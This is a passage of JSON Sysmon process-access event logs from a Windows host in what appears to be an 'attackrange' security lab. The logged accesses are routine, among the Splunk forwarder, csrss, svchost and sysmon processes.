AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4893,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-001028C60600}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-001028C60600}","TargetProcessId":"3468","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4894,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-001028C60600}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-001028C60600}","TargetProcessId":"3468","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4895,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4896,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4897,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4898,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4899,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4900,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
